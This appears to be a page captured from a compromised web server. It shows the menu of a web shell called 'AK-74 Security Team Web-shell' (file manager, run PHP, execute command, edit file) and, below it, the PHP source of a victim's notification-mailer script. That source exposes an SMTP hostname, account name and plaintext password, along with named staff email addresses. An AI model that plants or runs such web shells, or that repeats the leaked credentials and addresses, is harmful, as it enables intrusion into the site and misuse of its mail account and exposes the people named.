.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php session_start(); include ('../init.php'); include ('../func/fn_common.php'); checkUserSession(); loadLanguage($gsValues['LANGUAGE']); //date_default_timezone_set('Etc/UTC'); require 'PHPMailerAutoload.php'; $mail = new PHPMailer; $mail->CharSet = "UTF-8"; //Tell PHPMailer to use SMTP $mail->isSMTP(); //Enable SMTP debugging // 0 = off (for production use) // 1 = client messages // 2 = client and server messages $mail->SMTPDebug = 0; //Ask for HTML-friendly debug output $mail->Debugoutput = 'html'; //Set the hostname of the mail server $mail->Host = "mail.digimapavl.com"; //Set the SMTP port number - likely to be 25, 465 or 587 $mail->Port = 25; //Whether to use SMTP authentication $mail->SMTPAuth = true; //Username to use for SMTP authentication $mail->Username = "event@digimapavl.com"; //Password to use for SMTP authentication $mail->Password = "!@#$%^"; //Set who the message is to be sent from $mail->setFrom('event@digimapavl.com', 'Digitalmap system'); //Set an alternative reply-to address $mail->addReplyTo('a.gohary@saudiex.com.sa', 'digitalmap'); //Set who the message is to be sent to // $maillist=array("0"=>"o.matran@saudiex.com.sa","1"=>"h.hejazi@saudiex.com.sa"); $maillists = array('o.matran@saudiex.com.sa', 'h.hejazi@saudiex.com.sa', 'a.gohary@saudiex.com.sa'); foreach ($maillists as $maillist) { $mail->addAddress($maillist,$maillist); //$mail->addAddress('a.gohary@saudiex.com.sa', 'support'); //Set the subject line $mail->Subject = 'لقد قام ' . $_SESSION['username'].'بقحص التقرير '; //Read an HTML message body from an external file, convert referenced images to embedded, //convert HTML into a basic plain-text alternative body // $mail->msgHTML(file_get_contents('contents.html'), dirname(__FILE__)); $mail->msgHTML( 'لقد قام ' . $_SESSION['username'].'بقحص التقرير '); //Replace the plain text body with one created manually $mail->AltBody = ''; //Attach an image file //$mail->addAttachment('images/phpmailer_mini.png'); //send the message, check for errors if (!$mail->send()) { return false; } else { return true; } } ?>
Rename:
-